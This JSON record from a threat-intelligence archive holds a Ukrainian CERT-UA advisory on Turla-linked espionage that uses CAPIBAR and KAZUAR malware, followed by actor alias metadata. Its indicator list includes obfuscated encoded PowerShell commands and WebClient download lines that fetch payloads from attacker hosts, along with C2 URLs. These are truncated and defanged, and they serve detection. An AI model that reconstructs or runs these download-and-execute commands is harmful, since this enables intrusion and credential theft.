{ "id": "8e7f8a80-f51d-438a-8238-8d9d4449717a", "created_at": "2026-04-06T00:21:25.175698Z", "updated_at": "2026-04-10T03:36:47.89496Z", "deleted_at": null, "sha1_hash": "983294ce5c27defd61ec5df87893dc9a2bd9fa7c", "title": "CERT-UA", "llm_title": "", "authors": "", "file_creation_date": "0001-01-01T00:00:00Z", "file_modification_date": "0001-01-01T00:00:00Z", "file_size": 6908484, "plain_text": "CERT-UA\r\nArchived: 2026-04-05 20:12:24 UTC\r\nЗагальна інформаціяі\r\nУрядовою командою реагування на комп'ютерні надзвичайні події України CERT-UA вживаються заходи з\r\nпротидії кіберзагрозам. Так, з 2022 року за ідентифікатором UAC-0024 відслідковується активність, що\r\nполягає у здійсненні цільових кібератак, спрямованих проти сил оборони з метою шпигунства із\r\nзастосуванням шкідливої програми CAPIBAR (Microsoft: \"DeliveryCheck\", Mandiant: \"GAMEDAY\"). \r\nОкрім застосування XSLT (Extensible Stylesheet Language Transformations) та COM-hijacking специфіка\r\nCAPIBAR полягає в наявності серверної частини, що, зазвичай, встановлюється на скомпрометованих\r\nсерверах MS Exchange у вигляді MOF (Managed Object Format) файлу із застосуванням PowerShell-інструменту Desired State Configuration (DCS), фактично перетворюючи легітимний сервер в центр\r\nуправління шкідливою програмою.\r\nНа етапі первинної компрометації, окрім надсилання електронних листів з додатком у вигляді документу з\r\nмакросом, зловмисники можуть здійснювати модифікацію документів (наприклад, на внутрішньому\r\nзагальнодоступному мережевому ресурсі), додаючи в структуру легітимного макросу декілька рядків коду,\r\nякі забезпечать запуск PowerShell.\r\nПри цьому, за певних обставин на уражені ЕОМ довантажується складний багатофункціональний бекдор\r\nKAZUAR, в якому реалізовано більше 40 функцій, серед яких: \"chakra\" (запуск JS за допомогою\r\nChakraCore), \"eventlog\" (отримання даних з журналів ОС), \"forensic\" (збір артефактів: compatibilityassistant,\r\nexploreruserassist, activitiescache, prefetchfiles, muicache), \"steal\" (викрадення автентифікаційних даних:\r\npasswords, bookmarks, autofill, history, proxies, cookies, filezilla, chromium, mozilla, outlook, openvpn, system,\r\nwinscp, signal, git), \"unattend\" (викрадення баз даних/конфігураційних файлів програм: KeePass, Azure,\r\nGcloud, AWS, bluemix та інших).\r\nСеред іншого відомі випадки ексфільтрації з інфікованих ЕОМ файлів за визначеним переліком розширень\r\nз використанням легітимної програми rclone.\r\nЗ урахуванням особливостей тактик, технік та процедур, а також факту використанням програми\r\nKAZUAR, з достатнім рівнем впевненості описану активність (UAC-0024) асоційовано з угрупуванням\r\nTurla (UAC-0003, KRYPTON, Secret Blizzard), діяльність яких скеровується фсб росії.\r\nЗ метою створення сприятливих умов для детектування загрози, зразки шкідливих програм\r\nрозповсюджено серед компаній-розробників засобів захисту.\r\nПринагідно висловлюємо вдячність команді Microsoft Threat Intelligence (@MsftSecIntel) за безперервне\r\nсприяння в боротьбі з кіберзагозами в масштабах всієї країни.\r\nІндикатори кіберзагроз\r\nhttps://cert.gov.ua/article/5213167\r\nPage 1 of 5\n\nФайли:\r\ncdf7fa901701ea1ef642aeb271c703611c97f92a144ac17e35c0e40dc89e12211ef5a7d5eb8db57ab093987ae6f3b9dc\r\n153b713b3c6e642f39993d65ab33c5f0 5cf64f37fac74dc8f3dcb58831c3f2ce2b3cf522db448b40acdab254dd46cb3e\r\n9ececb4acbf692c2a8ea411f2e7dd006 07f9b090172535089eb62a175e5deaf95853fdfd4bcabf099619c60057d38c57\r\n5c7466a177fcaad2ebab131a54c28fab bd7dbaf91ba162b6623292ebcdd2768c5d87e518240fe8ca200a81e9c7f01d76\r\nb63c2ec9a631e0217d39c4a43527a0ce 1c1bb64e38c3fbe1a8f0dcb94ded96b332296bcbf839de438a4838fb43b20af3\r\n420b7dc391f2cb0a9a684c1c48c334e2 01c5778be73c10c167fae6d7970c0be23a29af1873d743419b1803c035d92ef7\r\n491e462bf1213fede82925dea5df8fff ba2c8df04bcba5c3cfd343a59d8b59b76779e6c27eb27b7ac73ded97e08f0f39\r\n9dd2bea4f2df8d3ef51dc10c6db2e07a aaf7642f0cab75240ec65bc052a0a602366740b31754156b3a0c44dccec9bebe\r\n8c56c22343853d3797037bdac2cec6c7 d4d7c12bdb66d40ad58c211dc6dd53a7494e03f9883336fa5464f0947530709f\r\n17402fc21c7bafae2c1a149035cd0835 19b7ddd3b06794abe593bf533d88319711ca15bb0a08901b4ab7e52aab015452\r\nd3065b4b1e8f6ecb63685219113ff0b8 4ef8db0ca305aaab9e2471b198168021c531862cb4319098302026b1cfa89947\r\n5210b3d85fd0026205baee2c77ac0acd 64e8744b39e15b76311733014327311acd77330f8a135132f020eac78199ac8a\r\n4065e647380358d22926c24a63c26ac4 5e122ff3066b6ef2a89295df925431c151f1713708c99772687a30c3204064bd\r\n11a289347b95aab157aa0efe4a59bf24 91dc8593ee573f3a07e9356e65e06aed58d8e74258313e3414a7de278b3b5233\r\ncba1f4c861240223332922d2913d18e5 b8ee794b04b69a1ee8687daabfe4f912368a500610a099e3072b03eeb66077f8\r\n65102299bf8d7f0129ebbcb08a9c2d98 8168dc0baea6a74120fbabea261e83377697cb5f9726a2514f38ed04b46c56c8\r\nХостові:\r\nC:\\Windows\\System32\\config\\systemprofile\\AppData\\Roaming\\ASKOD\\localhost.mof\r\nC:\\Windows\\System32\\config\\systemprofile\\AppData\\Roaming\\ZOV\\localhost.mof\r\nC:\\Windows\\System32\\Configuration\\Pending.mof\r\nC:\\ProgramData\\ASUS\\ASUS System Control Interface\\AsusSoftwareManager\\Config.dat\r\n%LOCALAPPDATA%\\Microsoft\\Windows\\INetCache\\IE\\8HIA0N4E\\logon[1].aspx\r\n%LOCALAPPDATA%\\assembly\\dl3\\QKP9W8EK.5CJ\\XRNLX3QV.5BO\\3d7183c9\\00000000_00000000\\__AssemblyInfo__.ini\r\n%LOCALAPPDATA%\\assembly\\dl3\\QKP9W8EK.5CJ\\XRNLX3QV.5BO\\3d7183c9\\00000000_00000000\\logon.aspx\r\n%LOCALAPPDATA%\\Microsoft\\OneDrive\\Update\\UpdateService.exe\r\n%LOCALAPPDATA%\\Microsoft\\OneDrive\\Update\\rclone.conf\r\n%LOCALAPPDATA%\\Microsoft\\Windows\\INetCache\\IE\\UOIQCADZ\\SYNC[1]\r\npowershell -e JAB3AD0AbgBlAFcALQBPAGIAagBFAGMAdAAgAHMAeQBzAHQAZQBtAC4AbgBlAHQALgB3AEUAYgBjAEwAaQBlAE4\r\npowershell -e JABHAHIAcQBkAHEAdwBkAGUAPQBOAGUAdwAtAE8AYgBqAEUAYwBUACAAUwBZAHMAVABlAE0ALgBOAEUAdAAuAFc\r\n$w=neW-ObjEct system.net.wEbcLieNt;$file=$w.DownLoadStRiNg('hxxps://www.adelaida[.]ua/plugins/vmsearc\r\n$Grqdqwde=New-ObjEcT SYsTeM.NEt.WebCLieNt;$iuaW=$Grqdqwde.DOwNLOaDStRiNg('hxxPs://aleimportadora[.]ne\r\n\"C:\\Users\\%USERNAME%\\AppData\\Local\\Microsoft\\OneDrive\\Update\\UpdateService.exe\" \"copy\" \"C:\\Users\\%USE\r\n\\Mozilla\\Updates Firefox Browser (Scheduled Task)\r\nHKEY_CURRENT_USER\\SOFTWARE\\Microsoft\\Gentling\r\nHKEY_CURRENT_USER\\SOFTWARE\\Microsoft\\Gentling\\Maleness\r\nHKEY_CURRENT_USER\\SOFTWARE\\Microsoft\\Gentling\\Maleness1\r\nHKEY_CURRENT_USER\\SOFTWARE\\Microsoft\\Gentling\\Maleness2\r\nHKEY_CURRENT_USER\\SOFTWARE\\Microsoft\\GameBarApi\\GameBarId\r\nHKEY_CURRENT_USER\\Software\\Classes\\CLSID\\{84F0FAE1-C27B-4F6F-807B-28CF6F96287D}\\InprocServer32\\1.0.0\r\nHKEY_CURRENT_USER\\Software\\Classes\\CLSID\\{8989946A-2F3B-4BE9-874E-D0B2B534ACA0}\\ScriptletURL\r\nHKEY_CURRENT_USER\\Software\\Classes\\CLSID\\{84f0fae1-c27b-4f6f-807b-28cf6f96287d}\\ScriptletURL\r\nhttps://cert.gov.ua/article/5213167\r\nPage 2 of 5\n\nМережеві:\r\nhXXps://www.adelaida[.]ua/plugins/vmsearch/wp-config-plugins.php\r\nhXXps://www.adelaida[.]ua/plugins/vmsearch/wp-config-themes.php\r\nhXXps://www.adelaida[.]ua/plugins/vmsearch/wp-file-script.js\r\nhXXps://atomydoc[.]kg/src/open_center/\r\nhXXps://atomydoc[.]kg/src/open_center/?page=ccl\r\nhXXps://atomydoc[.]kg/src/open_center/?page=fst\r\nhXXps://atomydoc[.]kg/src/open_center/?page=snd\r\nhXXps://atomydoc[.]kg/src/open_center/?page=trd\r\nhXXps://aleimportadora[.]net/images/slides_logo/\r\nhXXps://aleimportadora[.]net/images/slides_logo/?page=\r\nhXXps://aleimportadora[.]net/images/slides_logo/fg/message\r\nhXXps://aleimportadora[.]net/images/slides_logo/fg/music\r\nhXXps://aleimportadora[.]net/images/slides_logo/fg/video\r\nhXXps://aleimportadora[.]net/images/slides_logo/index.php\r\nhXXps://octoberoctopus.co[.]za/wp-includes/sitemaps/web/\r\nhXXps://sansaispa[.]com/wp-includes/images/gallery/\r\nhXXps://www.pierreagencement[.]fr/wp-content/languages/index.php\r\nhXXps://mail.aet.in[.]ua/outlook/api/logon.aspx\r\nhXXps://mail.kzp[.]bg/outlook/api/logon.aspx\r\nhXXps://mail.numina[.]md/owa/scripts/logon.aspx (CAPIBAR C2URL)\r\nhXXps://mail.aet.in[.]ua/outlook/api/logoff.aspx (CAPIBAR C2URL)\r\nhXXps://mail.arlingtonhousing[.]us/outlook/api/logoff.aspx (CAPIBAR C2URL)\r\nhXXps://mail.kzp[.]bg/outlook/api/logoff.aspx (CAPIBAR C2URL)\r\nhXXps://mail.lechateaudelatour[.]fr/MICROSOFT.EXCHANGE.MAILBOXREPLICATIONSERVICE.PROXYSERVICE/RPCWITH\r\nhXXps://mail.lebsack[.]de/MICROSOFT.EXCHANGE.MAILBOXREPLICATIONSERVICE.PROXYSERVICE/RPCWITHCERT/SYNC\r\nГрафічні зображення\r\nhttps://cert.gov.ua/article/5213167\r\nPage 3 of 5\n\nРис.1 Приклад ланцюга ураження шкідливою програмою CAPIBAR\r\nРис.2 Приклад серверної частини CAPIBAR\r\nhttps://cert.gov.ua/article/5213167\r\nPage 4 of 5\n\nРис.3 Приклад ланцюга запуску шкідливої програми KAZUAR\r\nSource: https://cert.gov.ua/article/5213167\r\nhttps://cert.gov.ua/article/5213167\r\nPage 5 of 5", "extraction_quality": 1, "language": "EN", "sources": [ "Malpedia" ], "references": [ "https://cert.gov.ua/article/5213167" ], "report_names": [ "5213167" ], "threat_actors": [ { "id": "8aaa5515-92dd-448d-bb20-3a253f4f8854", "created_at": "2024-06-19T02:03:08.147099Z", "updated_at": "2026-04-10T02:00:03.685355Z", "deleted_at": null, "main_name": "IRON HUNTER", "aliases": [ "ATK13 ", "Belugasturgeon ", "Blue Python ", "CTG-8875 ", "ITG12 ", "KRYPTON ", "MAKERSMARK ", "Pensive Ursa ", "Secret Blizzard ", "Turla", "UAC-0003 ", "UAC-0024 ", "UNC4210 ", "Venomous Bear ", "Waterbug " ], "source_name": "Secureworks:IRON HUNTER", "tools": [ "Carbon-DLL", "ComRAT", "LightNeuron", "Mosquito", "PyFlash", "Skipper", "Snake", "Tavdig" ], "source_id": "Secureworks", "reports": null }, { "id": "9f101d9c-05ea-48b9-b6f1-168cd6d06d12", "created_at": "2023-01-06T13:46:39.396409Z", "updated_at": "2026-04-10T02:00:03.312816Z", "deleted_at": null, "main_name": "Earth Lusca", "aliases": [ "CHROMIUM", "ControlX", "TAG-22", "BRONZE UNIVERSITY", "AQUATIC PANDA", "RedHotel", "Charcoal Typhoon", "Red Scylla", "Red Dev 10", "BountyGlad" ], "source_name": "MISPGALAXY:Earth Lusca", "tools": [ "RouterGod", "SprySOCKS", "ShadowPad", "POISONPLUG", "Barlaiy", "Spyder", "FunnySwitch" ], "source_id": "MISPGALAXY", "reports": null }, { "id": "a97cf06d-c2e2-4771-99a2-c9dee0d6a0ac", "created_at": "2022-10-25T16:07:24.349252Z", "updated_at": "2026-04-10T02:00:04.949821Z", "deleted_at": null, "main_name": "Turla", "aliases": [ "ATK 13", "Belugasturgeon", "Blue Python", "CTG-8875", "G0010", "Group 88", "ITG12", "Iron Hunter", "Krypton", "Makersmark", "Operation Epic Turla", "Operation Moonlight Maze", "Operation Penguin Turla", "Operation Satellite Turla", "Operation Skipper Turla", "Operation Turla Mosquito", "Operation WITCHCOVEN", "Pacifier APT", "Pensive Ursa", "Popeye", "SIG15", "SIG2", "SIG23", "Secret Blizzard", "TAG-0530", "Turla", "UNC4210", "Venomous Bear", "Waterbug" ], "source_name": "ETDA:Turla", "tools": [ "ASPXSpy", "ASPXTool", "ATI-Agent", "AdobeARM", "Agent.BTZ", "Agent.DNE", "ApolloShadow", "BigBoss", "COMpfun", "Chinch", "Cloud Duke", "CloudDuke", "CloudLook", "Cobra Carbon System", "ComRAT", "DoublePulsar", "EmPyre", "EmpireProject", "Epic Turla", "EternalBlue", "EternalRomance", "GoldenSky", "Group Policy Results Tool", "HTML5 Encoding", "HyperStack", "IcedCoffee", "IronNetInjector", "KSL0T", "Kapushka", "Kazuar", "KopiLuwak", "Kotel", "LOLBAS", "LOLBins", "LightNeuron", "Living off the Land", "Maintools.js", "Metasploit", "Meterpreter", "MiamiBeach", "Mimikatz", "MiniDionis", "Minit", "NBTscan", "NETTRANS", "NETVulture", "Neptun", "NetFlash", "NewPass", "Outlook Backdoor", "Penquin Turla", "Pfinet", "PowerShell Empire", "PowerShellRunner", "PowerShellRunner-based RPC backdoor", "PowerStallion", "PsExec", "PyFlash", "QUIETCANARY", "Reductor RAT", "RocketMan", "SMBTouch", "SScan", "Satellite Turla", "SilentMoon", "Sun rootkit", "TTNG", "TadjMakhal", "Tavdig", "TinyTurla", "TinyTurla Next Generation", "TinyTurla-NG", "Topinambour", "Tunnus", "Turla", "Turla SilentMoon", "TurlaChopper", "Uroburos", "Urouros", "WCE", "WITCHCOVEN", "WhiteAtlas", "WhiteBear", "Windows Credential Editor", "Windows Credentials Editor", "Wipbot", "WorldCupSec", "XTRANS", "certutil", "certutil.exe", "gpresult", "nbtscan", "nbtstat", "pwdump" ], "source_id": "ETDA", "reports": null }, { "id": "a97fee0d-af4b-4661-ae17-858925438fc4", "created_at": "2023-01-06T13:46:38.396415Z", "updated_at": "2026-04-10T02:00:02.957137Z", "deleted_at": null, "main_name": "Turla", "aliases": [ "TAG_0530", "Pacifier APT", "Blue Python", "UNC4210", "UAC-0003", "VENOMOUS Bear", "Waterbug", "Pfinet", "KRYPTON", "Popeye", "SIG23", "ATK13", "ITG12", "Group 88", "Uroburos", "Hippo Team", "IRON HUNTER", "MAKERSMARK", "Secret Blizzard", "UAC-0144", "UAC-0024", "G0010" ], "source_name": "MISPGALAXY:Turla", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "d11c89bb-1640-45fa-8322-6f4e4053d7f3", "created_at": "2022-10-25T15:50:23.509601Z", "updated_at": "2026-04-10T02:00:05.277674Z", "deleted_at": null, "main_name": "Turla", "aliases": [ "Turla", "IRON HUNTER", "Group 88", "Waterbug", "WhiteBear", "Krypton", "Venomous Bear", "Secret Blizzard", "BELUGASTURGEON" ], "source_name": "MITRE:Turla", "tools": [ "PsExec", "nbtstat", "ComRAT", "netstat", "certutil", "KOPILUWAK", "IronNetInjector", "LunarWeb", "Arp", "Uroburos", "PowerStallion", "Kazuar", "Systeminfo", "LightNeuron", "Mimikatz", "Tasklist", "LunarMail", "HyperStack", "NBTscan", "TinyTurla", "Penquin", "LunarLoader" ], "source_id": "MITRE", "reports": null }, { "id": "18a7b52d-a1cd-43a3-8982-7324e3e676b7", "created_at": "2025-08-07T02:03:24.688416Z", "updated_at": "2026-04-10T02:00:03.734754Z", "deleted_at": null, "main_name": "BRONZE UNIVERSITY", "aliases": [ "Aquatic Panda", "Aquatic Panda ", "CHROMIUM", "CHROMIUM ", "Charcoal Typhoon", "Charcoal Typhoon ", "Earth Lusca", "Earth Lusca ", "FISHMONGER ", "Red Dev 10", "Red Dev 10 ", "Red Scylla", "Red Scylla ", "RedHotel", "RedHotel ", "Tag-22", "Tag-22 " ], "source_name": "Secureworks:BRONZE UNIVERSITY", "tools": [ "Cobalt Strike", "Fishmaster", "FunnySwitch", "Spyder", "njRAT" ], "source_id": "Secureworks", "reports": null }, { "id": "6abcc917-035c-4e9b-a53f-eaee636749c3", "created_at": "2022-10-25T16:07:23.565337Z", "updated_at": "2026-04-10T02:00:04.668393Z", "deleted_at": null, "main_name": "Earth Lusca", "aliases": [ "Bronze University", "Charcoal Typhoon", "Chromium", "G1006", "Red Dev 10", "Red Scylla" ], "source_name": "ETDA:Earth Lusca", "tools": [ "Agentemis", "AntSword", "BIOPASS", "BIOPASS RAT", "BadPotato", "Behinder", "BleDoor", "Cobalt Strike", "CobaltStrike", "Doraemon", "FRP", "Fast Reverse Proxy", "FunnySwitch", "HUC Port Banner Scanner", "KTLVdoor", "Mimikatz", "NBTscan", "POISONPLUG.SHADOW", "PipeMon", "RbDoor", "RibDoor", "RouterGod", "SAMRID", "ShadowPad Winnti", "SprySOCKS", "WinRAR", "Winnti", "XShellGhost", "cobeacon", "fscan", "lcx", "nbtscan" ], "source_id": "ETDA", "reports": null }, { "id": "d53593c3-2819-4af3-bf16-0c39edc64920", "created_at": "2022-10-27T08:27:13.212301Z", "updated_at": "2026-04-10T02:00:05.272802Z", "deleted_at": null, "main_name": "Earth Lusca", "aliases": [ "Earth Lusca", "TAG-22", "Charcoal Typhoon", "CHROMIUM", "ControlX" ], "source_name": "MITRE:Earth Lusca", "tools": [ "Mimikatz", "PowerSploit", "Tasklist", "certutil", "Cobalt Strike", "Winnti for Linux", "Nltest", "NBTscan", "ShadowPad" ], "source_id": "MITRE", "reports": null } ], "ts_created_at": 1775434885, "ts_updated_at": 1775792207, "ts_creation_date": 0, "ts_modification_date": 0, "files": { "pdf": "https://archive.orkl.eu/983294ce5c27defd61ec5df87893dc9a2bd9fa7c.pdf", "text": "https://archive.orkl.eu/983294ce5c27defd61ec5df87893dc9a2bd9fa7c.txt", "img": "https://archive.orkl.eu/983294ce5c27defd61ec5df87893dc9a2bd9fa7c.jpg" } }